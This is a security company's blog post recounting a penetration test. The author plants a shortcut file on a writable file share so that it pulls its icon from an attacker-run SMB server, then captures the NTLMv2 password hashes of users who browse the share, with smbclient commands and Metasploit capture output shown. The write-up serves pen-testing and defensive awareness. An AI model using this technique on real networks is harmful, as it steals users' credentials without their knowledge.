Connect with our team of offensive security, AI security and pen testing experts at Black Hat Europe 2023. Learn More

Connect with our team of offensive security, AI security and pen testing experts at Black Hat Europe 2023. Learn More

Managed Detection & Response

Eradicate cyberthreats with world-class intel and expertise

Managed Security Services

Expand your team’s capabilities and strengthen your security posture

Consulting & Professional Services

Tap into our global team of tenured cybersecurity specialists

Penetration Testing

Subscription- or project-based testing, delivered by global experts

Database Security

Get ahead of database risk, protect data and exceed compliance requirements

Email Security & Management

Catch email threats others miss with layered security & maximum control

Co-Managed SOC (SIEM)

Eliminate alert fatigue, focus your SecOps team, stop threats fast, and reduce cyber risk

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
The Trustwave Approach
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Platform
SpiderLabs Fusion Center
Security Operations Centers
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

You down with LNK?

Oftentimes on an Internal pen test, I find myself with a limited-privilege domain user account. On a recent test, I got ahold of an account like this through various means of hackery. It didn't have local admin anywhere, it wasn't a member of any IT groups; it was just a super low privilege user from the Marketing department. The only real privilege it had was write access to the Marketing share. In a quest to gather more user accounts, I decided to abuse my write access to the share and drop a backdoored shortcut file.

The idea here is that we can create a random shortcut file that goes nowhere, but pulls its icon image from a remote share. When a domain user visits the marketing share with the malicious LNK file in it, Windows tries to load up all the pretty icons for the files on the share. In our case, Windows tries to grab the icon for our malicious LNK file, sees that it's on another share, and attempts to auth to the remote share to get the icon file. That remote share just so happens to be our rogue SMB server (running static challenges for Rainbow Tables goodness, of course).

Lets get to work.
Fire up a Windows machine to create a random shortcut file, and then edit the settings to have it pull its icon image from a local network share. Then, use a hex editor to swap the IP and sharename to point to our SMB listener:


Now, lets drop this file on our Marketing share:

# smbclient -U BANANASTAND/user%pass //[BANANASTAND] OS=[EMC-PEEL] Server=[COLDSTORAGE1]smb: \> put trustwave.lnkputting file trustwave.lnk as \trustwave.lnk (58.0 kb/s) (average 58.0 kb/s)smb: \> dir  .                                   D        0  Wed Mar 28 14:07:44 2012  Thumbs.db                          HS    94208  Tue Mar  6 09:56:01 2012  Sales Folder                        D        0  Thu Mar  8 11:36:10 2012  SCANNED CONTRACTS.lnk                      210  Mon Feb 13 12:52:04 2012  Shortcut to Sales Folder.lnk               279  Fri Oct 21 09:15:08 2011  Client folder                       D        0  Tue Mar 20 15:49:35 2012  trustwave.lnk                        A      475  Wed Mar 28 14:07:44 2012  Sales Folder - Shortcut.lnk                635  Tue Mar  6 09:55:09 201256721 blocks of size 8388608. 12215 blocks available

Great! When anyone visits the marketing share, they will see this inconspicuous shortcut file:


By the time they see it, their goose has already been cooked (er...hacked?). Their workstation has already gone hunting for the icon file located on our rogue SMB share:

msf  auxiliary(smb) >[*] SMB Captured - 2012-12-10 12:32:00 -0500NTLMv2 Response Captured from - DOMAIN:BANANASTAND OS: LM:LMHASH:Disabled LM_CLIENT_CHALLENGE:DisabledNTHASH:5630qw4fwer7013acf5665bre2d2weab8 NT_CLIENT_CHALLENGE:0101000000000000sdfh22353yk2356jl450239r7ebwe093ew00000000020000000000000000000000

That's it. By simply tricking a user into browsing a share, we can grab their password hash and start crackin' (or smb_relay them, if you are feeling lucky). What's nice about this attack is that it isn't limited to your local broadcast net like ARP Spoofing or any of the NBNS / LLMNR trickery. Its also pretty stealthy, there is no pop up boxes or error messages - Windows tries to auth to the SMB server, fails to get the icon file, and just moves on. This gives you the opportunity to quietly collect password hashes from several other users and propagate throughout the network nicely. Mmmmm, hashes.

Latest SpiderLabs Blogs

The 2023 Retail Services Sector Threat Landscape: A Trustwave Threat Intelligence Briefing

The annual holiday shopping season is poised for a surge in spending, a fact well-known to retailers, consumers, and cybercriminals alike. The latter group, however, is poised to exploit any...

Read More

Pwning Electroencephalogram (EEG) Medical Devices by Default

Overall Analysis of Vulnerability Identification – Default Credentials Leading to Remote Code Execution During internal network testing, a document was discovered titled the “XL Security Site...

Read More

Hidden Data Exfiltration Using Time, Literally

I was looking at my watch last week and my attention was moved towards the seconds over at the right of the watch face, incrementing nicely along as you’d expect. Now, I don’t know if I’d just spent...

Read More